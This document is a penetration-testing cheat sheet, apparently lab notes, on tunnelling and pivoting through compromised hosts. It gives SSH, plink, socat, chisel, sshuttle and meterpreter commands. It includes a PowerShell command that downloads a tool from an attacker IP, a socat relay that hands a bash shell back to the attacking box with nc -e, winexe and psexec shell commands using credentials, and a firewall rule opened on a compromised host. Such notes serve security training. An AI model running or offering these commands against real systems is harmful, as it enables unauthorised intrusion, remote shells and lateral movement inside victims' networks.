Port Forwarding/Tunneling and Pivoting

SSH Tunnelling / Port Forwarding

For example, if we had SSH access to 172.16.0.5 and there's a webserver running on 172.16.0.10, we could use this command to create a link to the server on 172.16.0.10.

ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN

We could then access the website on 172.16.0.10 (through 172.16.0.5) by navigating to port 8000 on our own attacking machine.

Proxies are made using the -D switch, for example: -D 1337. This will open up port 1337 on your attacking box as a proxy to send data through into the protected network. This is useful when combined with a tool such as proxychains. An example of this command would be:

ssh -D 1337 user@172.16.0.5 -fN

Reverse Connections

Generate a keypair:

ssh-keygen

Copy the contents of the public key (the file ending with .pub), then edit the ~/.ssh/authorized_keys file on your own attacking machine. You may need to create the ~/.ssh directory and authorized_keys file first. On a new line, type the following line, then paste in the public key:

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty INSERT_PUBLIC_KEY

This makes sure that the key can only be used for port forwarding, disallowing the ability to gain a shell on your attacking machine.

The only thing left is to do the unthinkable: transfer the private key to the target box. This is usually an absolute no-no, which is why we generated a throwaway set of SSH keys to be discarded as soon as the engagement is over.

With the key transferred, we can then connect back with a reverse port forward using the following command:

ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

To put that into the context of our fictitious IPs: 172.16.0.10 and 172.16.0.5, if we have a shell on 172.16.0.5 and want to give our attacking box (172.16.0.20) access to the webserver on 172.16.0.10, we could use this command on the 172.16.0.5 machine:

ssh -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -fN

This command can be used to create a reverse proxy in clients which do support it:

ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

To close any of these connections, type ps aux | grep ssh into the terminal of the machine that created the connection.

Finally, type sudo kill PID to close the connection.

Download plink.exe

C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8/plink.exe', 'plink.exe')"

Start SSH service on our attacking box.

root@kali:~# service ssh start

Run plink.exe

C:\Users\Alfred>plink.exe -l root -pw  -R 445:127.0.0.1:445 ATK_IP

Or

C:\Users\Alfred>plink.exe -l root@ATK_IP -R 445:127.0.0.1:445

Or

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

Note that any keys generated by ssh-keygen will not work properly here. You will need to convert them using the puttygen tool, which can be installed on Kali using sudo apt install putty-tools. After downloading the tool, conversion can be done with: puttygen KEYFILE -o OUTPUT_KEY.ppk Substituting in a valid file for the keyfile, and adding in the output file.

Use winexe to get a shell

root@kali:~# winexe -U Administrator //127.0.0.1 "cmd.exe"
root@kali:~# winexe -U 'admin@password123' //127.0.0.1 cmd.exe

or

psexec.py USER:PASSWORD@IP cmd.exe

Socat

Reverse Shell Relay

First let's start a standard netcat listener on our attacking box

sudo nc -lvnp 443

Next, on the compromised server, use the following command to start the relay:

./socat tcp-l:20000 tcp:ATTACKING_IP:443 &
./nc 127.0.0.1 20000 -e /bin/bash

Port Forwarding

  • Easy On the compromised server
./socat tcp-l:LOCAL_PORT,fork,reuseaddr tcp:TARGET_IP:TARGET_PORT &
  • Quiet

On the attacking machine

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &

On the compromised relay server

./socat tcp:ATTACKING_IP:8001 tcp:TARGET_IP:TARGET_PORT,fork &

Check localhost:8000 on the attacker machine to see the port available on the intended target.

Chisel

Reverse SOCKS Proxy

On the attacking machine start the server

./chisel server -p 8081 -reverse

./chisel server -p LISTEN_PORT --reverse &

On the target machine start the listening client

.\chisel.exe client 10.10.14.97:8081 R:8888:127.0.0.1:8888

./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

./chisel client 172.16.0.200:4242 R:socks &

Forward SOCKS Proxy

Open port in windows firewall

netsh advfirewall firewall add rule name="Chisel-MuirlandOracle" dir=in action=allow protocol=tcp localport=47000

First, on the compromised host we would use:

./chisel server -p LISTEN_PORT --socks5

On our own attacking box we would then use:

./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

sshuttle

# 
sshuttle -r user@172.16.0.5 172.16.0.0/24
# using key-based authentication to the server (172.16.0.5)
sshuttle -r user@172.16.0.5 --ssh-cmd "ssh -i private_key" 172.16.0.0/24
# Exclude compromised server from the subnet range using the -x switch
sshuttle -r root@10.200.198.200 --ssh-cmd "ssh -i id_rsa" 10.200.198.0/24 -x 10.200.198.200

Pivoting

Post exploitation on a windows machine. Find what machine the target is talking to

arp -a

On a meterpreter shell

run autoroute -s 10.10.10.0/24

List routes

run autoroute -p

background

use autiliary/scanner/portscan/tcp
set PORTS 80, 8080, 445, 21, 22
set RHOSTS 192.69.228.3-10
exploit

Back on the meterpreter session
portfwd add -l 1234 -p 21 -r 192.58.241.3
portfwd list

nmap -sS -sV -p 1234 localhost
use auxiliary/scanner/portscan/tcp

Ping Sweeps

bash
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

netcat
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

Proxychains

  • /etc/proxychains4.conf
socks5 127.0.0.1 1080

Run a command you need to prefix it with “proxychains